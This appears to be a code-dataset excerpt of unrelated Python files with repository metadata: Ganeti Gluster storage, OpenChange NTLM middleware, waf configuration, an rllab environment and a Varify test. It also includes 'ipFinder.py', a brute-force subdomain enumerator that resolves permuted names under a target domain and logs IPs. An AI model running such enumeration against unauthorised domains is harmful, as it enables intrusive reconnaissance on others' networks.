# usage message gets printed out. All you get is a Byson parser error in the
# gluster log files about an unexpected token in line 1, "". (That's stdin.)
#
# Not that we rely on that output in any way whatsoever...
parser_confusing = io.PathJoin(self.mount_point,
self._GetFUSEMountString())
if os.path.exists(parser_confusing):
reasons.append("%r: please delete, rename or move." % parser_confusing)
# Let's try something else: can we connect to the server?
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((self.server_ip, self.port))
sock.close()
except socket.error as err:
reasons.append("%s:%d: %s" % (self.server_ip, self.port, err.strerror))
reasons.append("try running 'gluster volume info %s' on %s to ensure"
" it exists, it is started and it is using the tcp"
" transport" % (self.volume, self.server_ip))
return "; ".join(reasons)
def _GetFUSEMountString(self):
"""Return the string FUSE needs to mount this volume.
@rtype: str
"""
return "-o server-port={port} {ip}:/{volume}" \
.format(port=self.port, ip=self.server_ip, volume=self.volume)
def GetKVMMountString(self, path):
"""Return the string KVM needs to use this volume.
@rtype: str
"""
ip = self.server_ip
if netutils.IPAddress.GetAddressFamily(ip) == socket.AF_INET6:
ip = "[%s]" % ip
return "gluster://{ip}:{port}/{volume}/{path}" \
.format(ip=ip, port=self.port, volume=self.volume, path=path)
def Mount(self):
"""Try and mount the volume. No-op if the volume is already mounted.
@raises BlockDeviceError: if the mount was unsuccessful
@rtype: context manager
@return: A simple context manager that lets you use this volume for
short lived operations like so::
with volume.mount():
# Do operations on volume
# Volume is now unmounted
"""
class _GlusterVolumeContextManager(object):
def __init__(self, volume):
self.volume = volume
def __enter__(self):
# We're already mounted.
return self
def __exit__(self, *exception_information):
self.volume.Unmount()
return False # do not swallow exceptions.
if self._IsMounted():
return _GlusterVolumeContextManager(self)
command = ["mount",
"-t", "glusterfs",
self._GetFUSEMountString(),
self.mount_point]
io.Makedirs(self.mount_point)
self._run_cmd(" ".join(command),
# Why set cwd? Because it's an area we control. If,
# for some unfortunate reason, this folder exists:
# "/%s/" % _GetFUSEMountString()
# ...then the gluster parser gets confused and treats
# _GetFUSEMountString() as your mount point and
# self.mount_point becomes a syntax error.
cwd=self.mount_point)
# mount.glusterfs exits with code 0 even after failure.
# https://bugzilla.redhat.com/show_bug.cgi?id=1031973
if not self._IsMounted():
reasons = self._GuessMountFailReasons()
if not reasons:
reasons = "%r failed." % (" ".join(command))
base.ThrowError("%r: mount failure: %s",
self.mount_point,
reasons)
return _GlusterVolumeContextManager(self)
def Unmount(self):
"""Try and unmount the volume.
Failures are logged but otherwise ignored.
@raises BlockDeviceError: if the volume was not mounted to begin with.
"""
if not self._IsMounted():
base.ThrowError("%r: should be mounted but isn't.", self.mount_point)
result = self._run_cmd(["umount",
self.mount_point])
if result.failed:
logging.warning("Failed to unmount %r from %r: %s",
self, self.mount_point, result.fail_reason)
class GlusterStorage(base.BlockDev):
"""File device using the Gluster backend.
This class represents a file storage backend device stored on Gluster. Ganeti
mounts and unmounts the Gluster devices automatically.
The unique_id for the file device is a (file_driver, file_path) tuple.
"""
def __init__(self, unique_id, children, size, params, dyn_params, **kwargs):
"""Initalizes a file device backend.
"""
if children:
base.ThrowError("Invalid setup for file device")
try:
self.driver, self.path = unique_id
except ValueError: # wrong number of arguments
raise ValueError("Invalid configuration data %s" % repr(unique_id))
server_addr = params[constants.GLUSTER_HOST]
port = params[constants.GLUSTER_PORT]
volume = params[constants.GLUSTER_VOLUME]
self.volume = GlusterVolume(server_addr, port, volume)
self.full_path = io.PathJoin(self.volume.mount_point, self.path)
self.file = None
super(GlusterStorage, self).__init__(unique_id, children, size,
params, dyn_params, **kwargs)
self.Attach()
def Assemble(self):
"""Assemble the device.
Checks whether the file device exists, raises BlockDeviceError otherwise.
"""
assert self.attached, "Gluster file assembled without being attached"
self.file.Exists(assert_exists=True)
def Shutdown(self):
"""Shutdown the device.
"""
self.file = None
self.dev_path = None
self.attached = False
def Open(self, force=False, exclusive=True):
"""Make the device ready for I/O.
This is a no-op for the file type.
"""
assert self.attached, "Gluster file opened without being attached"
def Close(self):
"""Notifies that the device will no longer be used for I/O.
This is a no-op for the file type.
"""
pass
def Remove(self):
"""Remove the file backing the block device.
@rtype: boolean
@return: True if the removal was successful
"""
with self.volume.Mount():
self.file = FileDeviceHelper(self.full_path)
if self.file.Remove():
self.file = None
return True
else:
return False
def Rename(self, new_id):
"""Renames the file.
"""
# TODO: implement rename for file-based storage
base.ThrowError("Rename is not supported for Gluster storage")
def Grow(self, amount, dryrun, backingstore, excl_stor):
"""Grow the file
@param amount: the amount (in mebibytes) to grow with
"""
self.file.Grow(amount, dryrun, backingstore, excl_stor)
def Attach(self, **kwargs):
"""Attach to an existing file.
Check if this file already exists.
@rtype: boolean
@return: True if file exists
"""
try:
self.volume.Mount()
self.file = FileDeviceHelper(self.full_path)
self.dev_path = self.full_path
except Exception as err:
self.volume.Unmount()
raise err
self.attached = self.file.Exists()
return self.attached
def GetActualSize(self):
"""Return the actual disk size.
@note: the device needs to be active when this is called
"""
return self.file.Size()
def GetUserspaceAccessUri(self, hypervisor):
"""Generate KVM userspace URIs to be used as `-drive file` settings.
@see: L{BlockDev.GetUserspaceAccessUri}
@see: https://github.com/qemu/qemu/commit/8d6d89cb63c57569864ecdeb84d3a1c2eb
"""
if hypervisor == constants.HT_KVM:
return self.volume.GetKVMMountString(self.path)
else:
base.ThrowError("Hypervisor %s doesn't support Gluster userspace access" %
hypervisor)
@classmethod
def Create(cls, unique_id, children, size, spindles, params, excl_stor,
dyn_params, **kwargs):
"""Create a new file.
@param size: the size of file in MiB
@rtype: L{bdev.FileStorage}
@return: an instance of FileStorage
"""
if excl_stor:
raise errors.ProgrammerError("FileStorage device requested with"
" exclusive_storage")
if not isinstance(unique_id, (tuple, list)) or len(unique_id) != 2:
raise ValueError("Invalid configuration data %s" % str(unique_id))
full_path = unique_id[1]
server_addr = params[constants.GLUSTER_HOST]
port = params[constants.GLUSTER_PORT]
volume = params[constants.GLUSTER_VOLUME]
volume_obj = GlusterVolume(server_addr, port, volume)
full_path = io.PathJoin(volume_obj.mount_point, full_path)
# Possible optimization: defer actual creation to first Attach, rather
# than mounting and unmounting here, then remounting immediately after.
with volume_obj.Mount():
FileDeviceHelper.CreateFile(full_path, size, create_folders=True)
return GlusterStorage(unique_id, children, size, params, dyn_params,
**kwargs)
|
andir/ganeti
|
lib/storage/gluster.py
|
Python
|
bsd-2-clause
| 14,117
|
#/usr/bin/env python
import socket, itertools, sys, argparse, smtplib
print '''================================================
___ _____ _ _
|_ _|_ __ | ___(_)_ __ __| | ___ _ __
| || '_ \| |_ | | '_ \ / _` |/ _ \ '__|
| || |_) | _| | | | | | (_| | __/ |
|___| .__/|_| |_|_| |_|\__,_|\___|_|
|_|
@x86p3nguin
================================================'''
ipList = []
subdomains = []
itcnt = 0
parser = argparse.ArgumentParser()
parser.add_argument('-sM',
action='store_true',
help='Do not record the same IP address in the log.')
parser.add_argument('domain',
help='The domain to find IP addresses of.')
parser.add_argument('-cS',
nargs=1,
default='1',
help='The number of the character set to try.\n'+
' [1]-abcdefghijklmnopqrstuvwxyz --\n'+
' [2]-abcdefghijklmnopqrstuvwxyz. \n'+
' [3]-abcdefghijklmnopqrstuvwxyz0123456789\n'+
' [4]-abcdefghijklmnopqrstuvwxyz0123456789.\n'+
' [5]-aabcdeefghhiijklmnnoopqrssttuvwxyz00112233445566778899.\n'+
' [6]-aabcdeefghhiijklmnnoopqrssttuvwxyz')
args = parser.parse_args()
args.cS = int(args.cS[0])-1
if args.domain.startswith('.') == False:
args.domain = '.'+args.domain
charset = ['abcdefghijklmnopqrstuvwxyz',
'abcdefghijklmnopqrstuvwxyz.',
'abcdefghijklmnopqrstuvwxyz0123456789',
'abcdefghijklmnopqrstuvwxyz0123456789.',
'aabcdeefghhiijklmnnoopqrssttuvwxyz00112233445566778899.',
'aabcdeefghhiijklmnnoopqrssttuvwxyz']
print '['+ str(args.cS+1) +']', charset[args.cS]
for length in range(60):
for i in itertools.permutations(charset[args.cS],length):
i = ''.join(i)
if i in subdomains:
continue
subdomains.append(i)
if itcnt % 1000 == 0:
print i+args.domain, itcnt
try:
ip = socket.gethostbyname(i+args.domain)
print 'The IP address of '+i+args.domain+' is: '+ ip
if ip not in ipList:
if args.sM:
ipList.append(ip)
with open('ip.log', 'a+') as logFile:
logFile.write(ip+' '+i+args.domain+'\n')
except:
pass
itcnt += 1
|
x86penguin/IpFinder
|
ipFinder.py
|
Python
|
mit
| 2,271
|
# NTLMAuthHandler.py -- OpenChange RPC-over-HTTP implementation
#
# Copyright (C) 2012 Wolfgang Sourdeau <wsourdeau@inverse.ca>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""This module provides the NTLMAuthHandler class, a WSGI middleware that
enables NTLM authentication via RPC to Samba.
It works by proxying the NTLMSSP payload between the client and the samba
server. Accessorily it could be used against an MS Exchange service, but this
is untested.
"""
import httplib
from socket import socket, _socketobject, SHUT_RDWR, AF_INET, AF_UNIX, \
SOCK_STREAM, MSG_WAITALL, error as socket_error
from struct import pack, error as struct_error
import sys
from uuid import uuid4, UUID
from openchange.utils.packets import *
COOKIE_NAME = "ocs-ntlm-auth"
SAMBA_PORT = 1024
class NTLMAuthHandler(object):
"""
HTTP/1.0 ``NTLM`` authentication middleware
Parameters: application -- the application object that is called only upon
successful authentication.
"""
def __init__(self, application, samba_host="localhost"):
# TODO: client expiration and/or cleanup
self.client_status = {}
self.application = application
self.samba_host = samba_host
def _in_progress_response(self, start_response,
ntlm_data=None, client_id=None):
status = "401 %s" % httplib.responses[401]
content = "More data needed..."
headers = [("Content-Type", "text/plain"),
("Content-Length", "%d" % len(content))]
if ntlm_data is None:
www_auth_value = "NTLM"
else:
enc_ntlm_data = ntlm_data.encode("base64")
www_auth_value = ("NTLM %s"
% enc_ntlm_data.strip().replace("\n", ""))
if client_id is not None:
# MUST occur when ntlm_data is None, can still occur otherwise
headers.append(("Set-Cookie", "%s=%s" % (COOKIE_NAME, client_id)))
headers.append(("WWW-Authenticate", www_auth_value))
start_response(status, headers)
return [content]
def _get_cookies(self, env):
cookies = {}
if "HTTP_COOKIE" in env:
cookie_str = env["HTTP_COOKIE"]
for pair in cookie_str.split(";"):
(key, value) = pair.strip().split("=")
cookies[key] = value
return cookies
def _handle_negotiate(self, client_id, env, start_response):
# print >>sys.stderr, "* client auth stage0"
auth = env["HTTP_AUTHORIZATION"]
ntlm_payload = auth[5:].decode("base64")
# print >> sys.stderr, "connecting to host"
try:
server = socket(AF_INET, SOCK_STREAM)
server.connect((self.samba_host, SAMBA_PORT))
except:
print >>sys.stderr, \
("NTLMAuthHandler: caught exception when connecting to samba"
" host")
raise
# print >> sys.stderr, "host: %s" % str(server.getsockname())
# print >> sys.stderr, "building bind packet"
packet = RPCBindOutPacket()
packet.ntlm_payload = ntlm_payload
# print >> sys.stderr, "sending bind packet"
server.sendall(packet.make())
# print >> sys.stderr, "sent bind packet, receiving response"
packet = RPCPacket.from_file(server)
# print >> sys.stderr, "response parsed: %s" % packet.pretty_dump()
if isinstance(packet, RPCBindACKPacket):
# print >> sys.stderr, "ACK received"
client_id = str(uuid4())
self.client_status[client_id] = {"status": "challenged",
"server": server}
response = self._in_progress_response(start_response,
packet.ntlm_payload,
client_id)
else:
# print >> sys.stderr, "NAK received"
server.shutdown(SHUT_RDWR)
server.close()
response = self._in_progress_response(start_response)
return response
def _handle_auth(self, client_id, env, start_response):
# print >>sys.stderr, "* client auth stage1"
server = self.client_status[client_id]["server"]
# print >> sys.stderr, "host: %s" % str(server.getsockname())
auth = env["HTTP_AUTHORIZATION"]
ntlm_payload = auth[5:].decode("base64")
# print >> sys.stderr, "building auth_3 and ping packets"
packet = RPCAuth3OutPacket()
packet.ntlm_payload = ntlm_payload
server.sendall(packet.make())
# This is a hack:
# A ping at this stage will trigger a connection close
# from Samba and an error from Exchange. Since a successful
# authentication does not trigger a response from the server, this
# provides a simple way to ensure that it passed, without actually
# performing an RPC operation on the "mgmt" interface. The choice of
# "mgmt" was due to the fact that we want to keep this authenticator
# middleware to be reusable for other Samba services while "mgmt"
# seemes to be the only available interface from Samba outside of the
# ones provided by OpenChange.
packet = RPCPingOutPacket()
packet.call_id = 2
server.sendall(packet.make())
# print >> sys.stderr, "sent auth3 and ping packets, receiving response"
try:
packet = RPCPacket.from_file(server)
if isinstance(packet, RPCFaultPacket):
if packet.header["call_id"] == 2:
# the Fault packet related to our Ping operation
success = True
else:
success = False
else:
raise ValueError("unexpected packet")
except socket_error:
# Samba closed the connection
success = True
except struct_error:
# Samba closed the connection
success = True
server.shutdown(SHUT_RDWR)
server.close()
if success:
del(self.client_status[client_id]["server"])
# authentication completed
self.client_status[client_id]["status"] = "ok"
response = self.application(env, start_response)
else:
# we start over with the whole process
del(self.client_status[client_id])
response = self._in_progress_response(start_response)
return response
def __call__(self, env, start_response):
# TODO: validate authorization payload
# print >>sys.stderr, "starting request: %d" % os.getpid()
# old model that only works with mod_wsgi:
# if "REMOTE_ADDR" in env and "REMOTE_PORT" in env:
# client_id = "%(REMOTE_ADDR)s:%(REMOTE_PORT)s".format(env)
has_auth = "HTTP_AUTHORIZATION" in env
cookies = self._get_cookies(env)
if COOKIE_NAME in cookies:
client_id = cookies[COOKIE_NAME]
else:
client_id = None
# print >>sys.stderr, "client_id: %s (known: %s)" % (str(client_id), client_id in self.client_status)
if has_auth:
if client_id is None or client_id not in self.client_status:
# stage 0, where the cookie has not been set yet and where we
# know the NTLM payload is a NEGOTIATE message
response = self._handle_negotiate(client_id,
env, start_response)
else:
# stage 1, where the client has already received the challenge
# from the server and is now sending an AUTH message
response = self._handle_auth(client_id, env, start_response)
else:
if client_id is None or client_id not in self.client_status:
# this client has never been seen
response = self._in_progress_response(start_response, None)
else:
# authenticated, where no NTLM payload is provided anymore
response = self.application(env, start_response)
return response
|
inverse-inc/openchange.old
|
python/openchange/web/auth/NTLMAuthHandler.py
|
Python
|
gpl-3.0
| 8,856
|
#! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! https://waf.io/book/index.html#_obtaining_the_waf_file
import os,shlex,sys,time,re,shutil
from waflib import ConfigSet,Utils,Options,Logs,Context,Build,Errors
BREAK='break'
CONTINUE='continue'
WAF_CONFIG_LOG='config.log'
autoconfig=False
conf_template='''# project %(app)s configured on %(now)s by
# waf %(wafver)s (abi %(abi)s, python %(pyver)x on %(systype)s)
# using %(args)s
#'''
class ConfigurationContext(Context.Context):
'''configures the project'''
cmd='configure'
error_handlers=[]
def __init__(self,**kw):
super(ConfigurationContext,self).__init__(**kw)
self.environ=dict(os.environ)
self.all_envs={}
self.top_dir=None
self.out_dir=None
self.tools=[]
self.hash=0
self.files=[]
self.tool_cache=[]
self.setenv('')
def setenv(self,name,env=None):
if name not in self.all_envs or env:
if not env:
env=ConfigSet.ConfigSet()
self.prepare_env(env)
else:
env=env.derive()
self.all_envs[name]=env
self.variant=name
def get_env(self):
return self.all_envs[self.variant]
def set_env(self,val):
self.all_envs[self.variant]=val
env=property(get_env,set_env)
def init_dirs(self):
top=self.top_dir
if not top:
top=Options.options.top
if not top:
top=getattr(Context.g_module,Context.TOP,None)
if not top:
top=self.path.abspath()
top=os.path.abspath(top)
self.srcnode=(os.path.isabs(top)and self.root or self.path).find_dir(top)
assert(self.srcnode)
out=self.out_dir
if not out:
out=Options.options.out
if not out:
out=getattr(Context.g_module,Context.OUT,None)
if not out:
out=Options.lockfile.replace('.lock-waf_%s_'%sys.platform,'').replace('.lock-waf','')
out=os.path.realpath(out)
self.bldnode=(os.path.isabs(out)and self.root or self.path).make_node(out)
self.bldnode.mkdir()
if not os.path.isdir(self.bldnode.abspath()):
conf.fatal('Could not create the build directory %s'%self.bldnode.abspath())
def execute(self):
self.init_dirs()
self.cachedir=self.bldnode.make_node(Build.CACHE_DIR)
self.cachedir.mkdir()
path=os.path.join(self.bldnode.abspath(),WAF_CONFIG_LOG)
self.logger=Logs.make_logger(path,'cfg')
app=getattr(Context.g_module,'APPNAME','')
if app:
ver=getattr(Context.g_module,'VERSION','')
if ver:
app="%s (%s)"%(app,ver)
now=time.ctime()
pyver=sys.hexversion
systype=sys.platform
args=" ".join(sys.argv)
wafver=Context.WAFVERSION
abi=Context.ABI
self.to_log(conf_template%vars())
self.msg('Setting top to',self.srcnode.abspath())
self.msg('Setting out to',self.bldnode.abspath())
if id(self.srcnode)==id(self.bldnode):
Logs.warn('Setting top == out (remember to use "update_outputs")')
elif id(self.path)!=id(self.srcnode):
if self.srcnode.is_child_of(self.path):
Logs.warn('Are you certain that you do not want to set top="." ?')
super(ConfigurationContext,self).execute()
self.store()
Context.top_dir=self.srcnode.abspath()
Context.out_dir=self.bldnode.abspath()
env=ConfigSet.ConfigSet()
env['argv']=sys.argv
env['options']=Options.options.__dict__
env.run_dir=Context.run_dir
env.top_dir=Context.top_dir
env.out_dir=Context.out_dir
env['hash']=self.hash
env['files']=self.files
env['environ']=dict(self.environ)
if not self.env.NO_LOCK_IN_RUN and not getattr(Options.options,'no_lock_in_run'):
env.store(os.path.join(Context.run_dir,Options.lockfile))
if not self.env.NO_LOCK_IN_TOP and not getattr(Options.options,'no_lock_in_top'):
env.store(os.path.join(Context.top_dir,Options.lockfile))
if not self.env.NO_LOCK_IN_OUT and not getattr(Options.options,'no_lock_in_out'):
env.store(os.path.join(Context.out_dir,Options.lockfile))
def prepare_env(self,env):
if not env.PREFIX:
if Options.options.prefix or Utils.is_win32:
env.PREFIX=os.path.abspath(os.path.expanduser(Options.options.prefix))
else:
env.PREFIX=''
if not env.BINDIR:
if Options.options.bindir:
env.BINDIR=os.path.abspath(os.path.expanduser(Options.options.bindir))
else:
env.BINDIR=Utils.subst_vars('${PREFIX}/bin',env)
if not env.LIBDIR:
if Options.options.libdir:
env.LIBDIR=os.path.abspath(os.path.expanduser(Options.options.libdir))
else:
env.LIBDIR=Utils.subst_vars('${PREFIX}/lib%s'%Utils.lib64(),env)
def store(self):
n=self.cachedir.make_node('build.config.py')
n.write('version = 0x%x\ntools = %r\n'%(Context.HEXVERSION,self.tools))
if not self.all_envs:
self.fatal('nothing to store in the configuration context!')
for key in self.all_envs:
tmpenv=self.all_envs[key]
tmpenv.store(os.path.join(self.cachedir.abspath(),key+Build.CACHE_SUFFIX))
def load(self,input,tooldir=None,funs=None):
tools=Utils.to_list(input)
if tooldir:tooldir=Utils.to_list(tooldir)
for tool in tools:
mag=(tool,id(self.env),tooldir,funs)
if mag in self.tool_cache:
self.to_log('(tool %s is already loaded, skipping)'%tool)
continue
self.tool_cache.append(mag)
module=None
try:
module=Context.load_tool(tool,tooldir,ctx=self)
except ImportError ,e:
self.fatal('Could not load the Waf tool %r from %r\n%s'%(tool,sys.path,e))
except Exception ,e:
self.to_log('imp %r (%r & %r)'%(tool,tooldir,funs))
self.to_log(Utils.ex_stack())
raise
if funs is not None:
self.eval_rules(funs)
else:
func=getattr(module,'configure',None)
if func:
if type(func)is type(Utils.readf):func(self)
else:self.eval_rules(func)
self.tools.append({'tool':tool,'tooldir':tooldir,'funs':funs})
def post_recurse(self,node):
super(ConfigurationContext,self).post_recurse(node)
self.hash=Utils.h_list((self.hash,node.read('rb')))
self.files.append(node.abspath())
def eval_rules(self,rules):
self.rules=Utils.to_list(rules)
for x in self.rules:
f=getattr(self,x)
if not f:self.fatal("No such method '%s'."%x)
try:
f()
except Exception ,e:
ret=self.err_handler(x,e)
if ret==BREAK:
break
elif ret==CONTINUE:
continue
else:
raise
def err_handler(self,fun,error):
pass
def conf(f):
def fun(*k,**kw):
mandatory=True
if'mandatory'in kw:
mandatory=kw['mandatory']
del kw['mandatory']
try:
return f(*k,**kw)
except Errors.ConfigurationError:
if mandatory:
raise
setattr(ConfigurationContext,f.__name__,fun)
setattr(Build.BuildContext,f.__name__,fun)
return f
@conf
def add_os_flags(self,var,dest=None,dup=True):
try:
flags=shlex.split(self.environ[var])
except KeyError:
return
if dup or''.join(flags)not in''.join(Utils.to_list(self.env[dest or var])):
self.env.append_value(dest or var,flags)
@conf
def cmd_to_list(self,cmd):
if isinstance(cmd,str)and cmd.find(' '):
try:
os.stat(cmd)
except OSError:
return shlex.split(cmd)
else:
return[cmd]
return cmd
@conf
def check_waf_version(self,mini='1.7.99',maxi='1.9.0',**kw):
self.start_msg('Checking for waf version in %s-%s'%(str(mini),str(maxi)),**kw)
ver=Context.HEXVERSION
if Utils.num2ver(mini)>ver:
self.fatal('waf version should be at least %r (%r found)'%(Utils.num2ver(mini),ver))
if Utils.num2ver(maxi)<ver:
self.fatal('waf version should be at most %r (%r found)'%(Utils.num2ver(maxi),ver))
self.end_msg('ok',**kw)
@conf
def find_file(self,filename,path_list=[]):
for n in Utils.to_list(filename):
for d in Utils.to_list(path_list):
p=os.path.join(d,n)
if os.path.exists(p):
return p
self.fatal('Could not find %r'%filename)
@conf
def find_program(self,filename,**kw):
exts=kw.get('exts',Utils.is_win32 and'.exe,.com,.bat,.cmd'or',.sh,.pl,.py')
environ=kw.get('environ',getattr(self,'environ',os.environ))
ret=''
filename=Utils.to_list(filename)
msg=kw.get('msg',', '.join(filename))
var=kw.get('var','')
if not var:
var=re.sub(r'[-.]','_',filename[0].upper())
path_list=kw.get('path_list','')
if path_list:
path_list=Utils.to_list(path_list)
else:
path_list=environ.get('PATH','').split(os.pathsep)
if var in environ:
filename=environ[var]
if os.path.isfile(filename):
ret=[filename]
else:
ret=self.cmd_to_list(filename)
elif self.env[var]:
ret=self.env[var]
ret=self.cmd_to_list(ret)
else:
if not ret:
ret=self.find_binary(filename,exts.split(','),path_list)
if not ret and Utils.winreg:
ret=Utils.get_registry_app_path(Utils.winreg.HKEY_CURRENT_USER,filename)
if not ret and Utils.winreg:
ret=Utils.get_registry_app_path(Utils.winreg.HKEY_LOCAL_MACHINE,filename)
ret=self.cmd_to_list(ret)
if ret:
if len(ret)==1:
retmsg=ret[0]
else:
retmsg=ret
else:
retmsg=False
self.msg("Checking for program '%s'"%msg,retmsg,**kw)
if not kw.get('quiet',None):
self.to_log('find program=%r paths=%r var=%r -> %r'%(filename,path_list,var,ret))
if not ret:
self.fatal(kw.get('errmsg','')or'Could not find the program %r'%filename)
interpreter=kw.get('interpreter',None)
if interpreter is None:
if not Utils.check_exe(ret[0],env=environ):
self.fatal('Program %r is not executable'%ret)
self.env[var]=ret
else:
self.env[var]=self.env[interpreter]+ret
return ret
@conf
def find_binary(self,filenames,exts,paths):
for f in filenames:
for ext in exts:
exe_name=f+ext
if os.path.isabs(exe_name):
if os.path.isfile(exe_name):
return exe_name
else:
for path in paths:
x=os.path.expanduser(os.path.join(path,exe_name))
if os.path.isfile(x):
return x
return None
@conf
def run_build(self,*k,**kw):
lst=[str(v)for(p,v)in kw.items()if p!='env']
h=Utils.h_list(lst)
dir=self.bldnode.abspath()+os.sep+(not Utils.is_win32 and'.'or'')+'conf_check_'+Utils.to_hex(h)
try:
os.makedirs(dir)
except OSError:
pass
try:
os.stat(dir)
except OSError:
self.fatal('cannot use the configuration test folder %r'%dir)
cachemode=getattr(Options.options,'confcache',None)
if cachemode==1:
try:
proj=ConfigSet.ConfigSet(os.path.join(dir,'cache_run_build'))
except OSError:
pass
except IOError:
pass
else:
ret=proj['cache_run_build']
if isinstance(ret,str)and ret.startswith('Test does not build'):
self.fatal(ret)
return ret
bdir=os.path.join(dir,'testbuild')
if not os.path.exists(bdir):
os.makedirs(bdir)
self.test_bld=bld=Build.BuildContext(top_dir=dir,out_dir=bdir)
bld.init_dirs()
bld.progress_bar=0
bld.targets='*'
bld.logger=self.logger
bld.all_envs.update(self.all_envs)
bld.env=kw['env']
bld.kw=kw
bld.conf=self
kw['build_fun'](bld)
ret=-1
try:
try:
bld.compile()
except Errors.WafError:
ret='Test does not build: %s'%Utils.ex_stack()
self.fatal(ret)
else:
ret=getattr(bld,'retval',0)
finally:
if cachemode==1:
proj=ConfigSet.ConfigSet()
proj['cache_run_build']=ret
proj.store(os.path.join(dir,'cache_run_build'))
else:
shutil.rmtree(dir)
return ret
@conf
def ret_msg(self,msg,args):
if isinstance(msg,str):
return msg
return msg(args)
@conf
def test(self,*k,**kw):
if not'env'in kw:
kw['env']=self.env.derive()
if kw.get('validate',None):
kw['validate'](kw)
self.start_msg(kw['msg'],**kw)
ret=None
try:
ret=self.run_build(*k,**kw)
except self.errors.ConfigurationError:
self.end_msg(kw['errmsg'],'YELLOW',**kw)
if Logs.verbose>1:
raise
else:
self.fatal('The configuration failed')
else:
kw['success']=ret
if kw.get('post_check',None):
ret=kw['post_check'](kw)
if ret:
self.end_msg(kw['errmsg'],'YELLOW',**kw)
self.fatal('The configuration failed %r'%ret)
else:
self.end_msg(self.ret_msg(kw['okmsg'],kw),**kw)
return ret
|
asljivo1/802.11ah-ns3
|
ns-3/.waf-1.8.12-f00e5b53f6bbeab1384a38c9cc5d51f7/waflib/Configure.py
|
Python
|
gpl-2.0
| 11,505
|
from rllab.envs.base import Env
from rllab.envs.base import Step
from rllab.spaces import Box
import numpy as np
class MultiMod2DEnv(Env):
"""
This is a single time-step MDP where the action taken corresponds to the next state (in a 2D plane).
The reward has a multi-modal gaussian shape, with the mode means set in a circle around the origin.
"""
def __init__(self, mu=(1, 0), sigma=0.01, n=2, rand_init=False):
self.mu = np.array(mu)
self.sigma = sigma #we suppose symetric Gaussians
self.n = n
self.rand_init = rand_init
@property
def observation_space(self):
return Box(low=-np.inf, high=np.inf, shape=(2,))
@property
def action_space(self):
return Box(low=5.0 * np.linalg.norm(self.mu), high=5.0 * np.linalg.norm(self.mu), shape=(2,))
def reset(self):
self._state = np.zeros(shape=(2,)) \
+ int(self.rand_init) * (
(np.random.rand(2, ) - 0.5) * 5 * np.linalg.norm(self.mu) ) ##mu is taken as largest
observation = np.copy(self._state)
return observation
def reward_state(self, state):
x = state
mu = self.mu
A = np.array([[np.cos(2. * np.pi / self.n), -np.sin(2. * np.pi / self.n)],
[np.sin(2. * np.pi / self.n), np.cos(2. * np.pi / self.n)]]) ##rotation matrix
reward = -0.5 + 1. / (2 * np.sqrt(np.power(2. * np.pi, 2.) * self.sigma)) * (
np.exp(-0.5 / self.sigma * np.linalg.norm(x - mu) ** 2))
for i in range(1, self.n):
mu = np.dot(A, mu)
reward += 1. / (2 * np.sqrt(np.power(2. * np.pi, 2.) * self.sigma)) * (
np.exp(-0.5 / self.sigma * np.linalg.norm(x - mu) ** 2))
return reward
def step(self, action):
self._state += action
done = True
next_observation = np.copy(self._state)
reward = self.reward_state(self._state)
return Step(observation=next_observation, reward=reward, done=done)
def render(self):
print('current state:', self._state)
def log_diagnostics(self, paths):
# to count the modes I need the current policy!
pass
|
florensacc/snn4hrl
|
envs/point/multiMod2D_env.py
|
Python
|
mit
| 2,207
|
import os
from django.db.models import Max
from django.test import TestCase
from django.core import management
from django.test.utils import override_settings
from django_rq import get_worker
from sts.models import System
from vdw.samples.models import Project, Batch, Cohort, Sample, \
SampleManifest, Result
from vdw.variants.models import Variant, VariantEffect, Sift, PolyPhen2, \
ThousandG, EVS
from vdw.variants.pipeline.utils import VariantCache
from vdw.genes.models import Transcript, Gene
from ..base import QueueTestCase
TESTS_DIR = os.path.join(os.path.dirname(__file__), '../..')
SAMPLE_DIRS = [os.path.join(TESTS_DIR, 'samples')]
class VariantCacheTestCase(TestCase):
def setUp(self):
self.vcache = VariantCache()
self.vcache._cache.clear()
def test(self):
# Not in there..
self.assertFalse('1234' in self.vcache)
# ..but stores a placholder
self.assertTrue('1234' in self.vcache)
@override_settings(VARIFY_SAMPLE_DIRS=SAMPLE_DIRS)
class SampleLoadTestCase(QueueTestCase):
def test_pipeline(self):
expected_counts = {
'batches': 2,
'cohorts': 2,
'genes': 65,
'projects': 1,
'results_per_sample': [
{
'batch': 'batch1',
'sample': 'NA12891',
'count': 1963,
},
{
'batch': 'batch1',
'sample': 'NA12892',
'count': 1963,
},
{
'batch': 'batch1',
'sample': 'NA12878',
'count': 1963,
},
{
'batch': 'batch2',
'sample': 'NA12891',
'count': 2094,
},
{
'batch': 'batch2',
'sample': 'NA12892',
'count': 2094,
},
{
'batch': 'batch2',
'sample': 'NA12878',
'count': 2094,
},
],
'samples': 6,
'transcripts': 108,
'variant_effects': 8788,
'variants': 4057,
'samples_per_batch': [(1, 3), (2, 3)],
}
expected_counts['results'] = \
sum([x['count'] for x in expected_counts['results_per_sample']])
# Immediately validates and creates a sample
management.call_command('samples', 'queue')
# Synchronously work on queue
worker1 = get_worker('variants')
worker2 = get_worker('default')
# Ensure sample-related entries are created..
self.assertEqual(Project.objects.count(), expected_counts['projects'])
self.assertEqual(Batch.objects.count(), expected_counts['batches'])
self.assertEqual(Sample.objects.count(), expected_counts['samples'])
# World and project cohort..
self.assertEqual(Cohort.objects.count(), expected_counts['cohorts'])
# Nothing published yet..
self.assertEqual(Sample.objects.filter(published=False).count(),
expected_counts['samples'])
self.assertEqual(
Cohort.objects.filter(count=0, published=False).count(),
expected_counts['cohorts'])
self.assertEqual(
Batch.objects.filter(count=0, published=False).count(),
expected_counts['batches'])
# Manifests are stored
self.assertEqual(SampleManifest.objects.count(),
expected_counts['samples'])
for manifest in SampleManifest.objects.all():
self.assertNotEqual(manifest.content, '')
self.assertFalse(manifest.content_has_changed())
# Work on variants...
worker1.work(burst=True)
self.assertEqual(Variant.objects.count(), expected_counts['variants'])
# Work on effects...
worker2.work(burst=True)
